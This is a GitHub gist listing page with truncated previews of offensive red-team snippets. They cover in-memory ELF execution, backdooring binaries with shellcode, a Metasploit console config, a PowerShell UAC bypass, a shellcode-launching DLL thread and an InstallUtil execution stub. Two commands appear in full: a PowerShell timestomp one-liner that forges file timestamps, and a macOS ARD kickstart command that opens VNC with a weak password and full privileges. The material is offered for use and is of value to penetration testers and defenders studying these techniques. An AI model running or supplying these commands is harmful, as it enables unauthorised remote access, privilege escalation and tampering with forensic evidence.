Skip to content

Instantly share code, notes, and snippets.

View ahhh's full-sized avatar
👾
danger code

Dan Borges ahhh

👾
danger code
784 followers · 785 following
View GitHub Profile
@ahhh
ahhh / invokeInMemLinux.go
Created July 19, 2020 21:22 — forked from capnspacehook/invokeInMemLinux.go
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
package main
import (
"io/ioutil"
"os"
"os/exec"
"strconv"
"syscall"
@ahhh
ahhh / binjection_example.gs
Created July 2, 2020 23:32
Binjection example in gscript
// Example gscript template
// Title: Binjection Example
// Author: ahhh
// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
// Gscript version: 1.0.0
// ATT&CK:
//priority:150
//timeout:150
//import:/tmp/loader.bin
@ahhh
ahhh / gbj.go
Created July 2, 2020 23:05
GBJ is a hacky shim used for using binjection in gscript
package gbj
import(
"github.com/Binject/binjection/bj"
)
func PeBinject(sourceBytes []byte, shellcodeBytes []byte) ([]byte, error) {
@ahhh
ahhh / binjection_example.go
Created July 2, 2020 00:04
Using the binject/binjection library programatically
package main
import(
"io/ioutil"
"fmt"
"github.com/Binject/binjection/bj"
)
var (
example_path = "example.exe"
@ahhh
ahhh / msfconsole.rc
Created February 25, 2020 09:02
example msfconsole.rc from red team planning book
spool /root/.msf4/spool.log
setg ConsoleLogging true
setg verbose true
setg LogLevel 5
setg SessionLogging true
setg TimestampOutput true
setg PromptTimeFormat %Y%m%d.%H%M%S%z
setg PROMPT %T S:%S J:%J
setg ExitOnSession false
setg DisableCourtesyShell true
@ahhh
ahhh / bypass_uac.ps1
Created September 27, 2019 21:50 — forked from tyranid/bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
@ahhh
ahhh / gist:7643cd8705697a4b5302edad1b41ee37
Created September 12, 2019 20:29 — forked from obscuresec/gist:7b0cf71d7a8dd5e7b54c
PowerShell TimeStomp
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
@ahhh
ahhh / ARD Kickstarter (vuln)
Last active August 20, 2019 19:40
Starts ARD using a vulnerable VNC password
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -clientopts -setvnclegacy -vnclegacy yes -clientopts -setvncpw -vncpw mypasswd -restart -agent -privs -all
@ahhh
ahhh / DllMainThread.c
Created June 20, 2019 18:59 — forked from securitytube/DllMainThread.c
Launch Shellcode as a Thread via DllMain rather than a new process
// Dll Hijacking via Thread Creation
// Author - Vivek Ramachandran
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com
// Free Infosec Videos -- http://SecurityTube.net
#include <windows.h>
#define SHELLCODELEN 2048
@ahhh
ahhh / gethelp.cs
Created May 13, 2019 15:13
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause